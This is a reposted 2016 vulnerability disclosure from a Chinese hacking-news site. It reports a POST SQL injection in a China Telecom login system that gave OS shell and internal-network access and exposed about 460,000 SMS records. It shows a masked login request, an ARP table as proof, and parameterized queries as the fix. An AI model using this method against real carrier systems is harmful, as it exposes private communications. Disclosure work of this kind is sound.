记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

运营商安全之中国电信某系统存在sql注入漏洞支持osshell可内网涉及46W条短信记录

2016-07-03 22:35

地址:**.**.**.**:38003/Account/Index?msg=%E8%B4%A6%E6%88%B7%E6%88%96%E5%AF%86%E7%A0%81%E9%94%99%E8%AF%AF%EF%BC%81

QQ截图20160516171446.png



登录存在post注入,可union可os-shell

code 区域
POST **.**.**.**:38003/Account/Login HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Referer: **.**.**.**:38003/

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: **.**.**.**:38003

Content-Length: 40

Connection: Keep-Alive

Pragma: no-cache

Cookie: ASP.NET_SessionId=zvl0hake0tm13bwi2aabcf0p



username=admin&password=admin&vcode=3MR3



QQ截图20160516171251.png



QQ截图20160516171703.png

漏洞证明:

大量内网信息

QQ截图20160516171846.png



编码不是很好看,将就一下

QQ截图20160516180447.png



code 区域
接口: **.**.**.** --- 0x12

Internet 地址 物理地址 类型

**.**.**.** 00-00-5e-00-01-84 动态

**.**.**.** 7c-a2-3e-fb-3c-2a 动态

**.**.**.** 00-26-b9-42-0f-da 动态

**.**.**.** 00-26-b9-42-0e-d7 动态

**.**.**.** ff-ff-ff-ff-ff-ff 静态

**.**.**.** 01-00-5e-00-00-12 静态

**.**.**.** 01-00-5e-00-00-16 静态

**.**.**.** 01-00-5e-00-00-fc 静态

**.**.**.** 01-00-5e-03-ec-79 静态

**.**.**.** 01-00-5e-60-c6-73 静态

**.**.**.** 01-00-5e-52-45-7d 静态

**.**.**.** 01-00-5e-59-50-01 静态

**.**.**.** 01-00-5e-0b-ee-7c 静态

**.**.**.** 01-00-5e-17-ae-de 静态

**.**.**.** 01-00-5e-29-cd-8b 静态

**.**.**.** 01-00-5e-69-0a-af 静态

**.**.**.** 01-00-5e-1d-59-71 静态

**.**.**.** 01-00-5e-6b-73-31 静态

**.**.**.** 01-00-5e-5a-e1-7a 静态

**.**.**.** 01-00-5e-6c-36-74 静态

**.**.**.** 01-00-5e-41-fa-4c 静态

**.**.**.** 01-00-5e-59-dc-de 静态

**.**.**.** 01-00-5e-64-e3-dd 静态

**.**.**.** 01-00-5e-38-e2-6a 静态

**.**.**.** 01-00-5e-39-46-7d 静态

**.**.**.** 01-00-5e-3b-47-de 静态

**.**.**.** 01-00-5e-01-dc-72 静态

**.**.**.** 01-00-5e-7b-55-27 静态

**.**.**.** 01-00-5e-1f-54-31 静态

**.**.**.** 01-00-5e-40-26-3b 静态

**.**.**.** 01-00-5e-73-a4-b4 静态

**.**.**.** 01-00-5e-13-e4-7a 静态

**.**.**.** 01-00-5e-3d-3b-6a 静态

**.**.**.** 01-00-5e-1e-2d-24 静态

**.**.**.** 01-00-5e-21-b7-6f 静态

**.**.**.** 01-00-5e-5b-fb-b7 静态

**.**.**.** 01-00-5e-78-d8-de 静态

**.**.**.** 01-00-5e-58-8e-b4 静态

**.**.**.** 01-00-5e-77-50-31 静态

**.**.**.** 01-00-5e-61-e6-7c 静态

**.**.**.** 01-00-5e-13-07-b7 静态

**.**.**.** 01-00-5e-35-09-af 静态

**.**.**.** 01-00-5e-3f-ae-6e 静态

**.**.**.** 01-00-5e-76-71-31 静态

**.**.**.** 01-00-5e-68-83-b7 静态





QQ截图20160516201348.png



smsdb2-4381张表

QQ截图20160516202834.png



46W条短信记录

修复方案:

参数化查询

知识来源: www.wooyun.org/bugs/wooyun-2016-0209454

阅读:92381 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“运营商安全之中国电信某系统存在sql注入漏洞支持osshell可内网涉及46W条短信记录”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云